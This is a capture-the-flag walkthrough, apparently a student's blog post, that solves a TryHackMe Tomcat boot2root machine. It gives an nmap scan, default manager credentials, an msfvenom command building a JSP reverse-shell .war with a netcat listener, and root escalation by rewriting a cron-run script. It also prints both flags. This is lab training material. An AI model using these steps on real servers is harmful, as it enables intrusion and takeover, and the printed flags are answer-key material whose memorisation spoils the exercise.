boot2root machine for FIT and bsides guatemala CTF you can access it from here.
This walkthrough is written as a part of Master’s certificate in cybersecurity (Red Team) that I am pursuing from HackeU.
Firstly we have to make a connection with VPN or use the attack box on the Tryhackme site to connect to the Tryhackme lab environment.
Now we will deploy the machine after that we will get the Target system IP.
Starting with a regular nmap scan
nmap -sS -sC -sV 10.10.53.69
-sS (TCP SYN scan)
-sV (Version detection)
From scan we can see that 3 ports are open which are port 22,port 8080 and port 8009.
Since, port 8080/http is open, we will check in web server
We have opened the web server using the 8080 port, we got some information about tomcat
After some digging when i cliked on the Manage App button it showed me a login dialog box.
As I was not sure of the credentials, I clicked on the cancel button, it directs to the page, which has the credentials of tomcat ,manager.
Username :- tomcat
Password :- s3cret
Login to the tomcat manager application with the credentials.
After login, we see the admin dashboard for the website.
It also has an upload option with only for .war files. I searched a little about what is war file and its details we came to know that it is java related file.
So I used msfvenom to create a reverse shell payload with a .war extension
After uploading the file we see it on the webpage and when we click it , it gives a reverse connection to our netcat listener.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.11.235 LPORT=4444 -f war > shell.war
As seen we will select java/jsp_shell_reverse_tcp payload and will create a payload warfile to get reverse shell.
Now before clicking on the file we have to start netcat to listen and to get reverse shell.
nc -nlvp 4444
We got the shell. Now Its time to find the flags.
Found the first flag in the/home/jack directory
Note :- Spawning a interactive shell is a must.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Flag :- 39400c90bc683a41a8935e4719f181
We also see an id.sh & test.txt file and after some digging, I found out that a cronjob is associated with id.sh which executes the command in the file every minute.
using this to escalate our privileges.
As the .sh file will run after every 1 minute we can write our command in it and just get our command executed.
echo “cp /root/root.txt /home/jack/root.txt” > id.sh
After one minute we have our command executed successfully.
Root Flag :- d89d5391984c0450a95497153ae7ca3a
The Room is completed. Do leave some claps if this helped you in any way.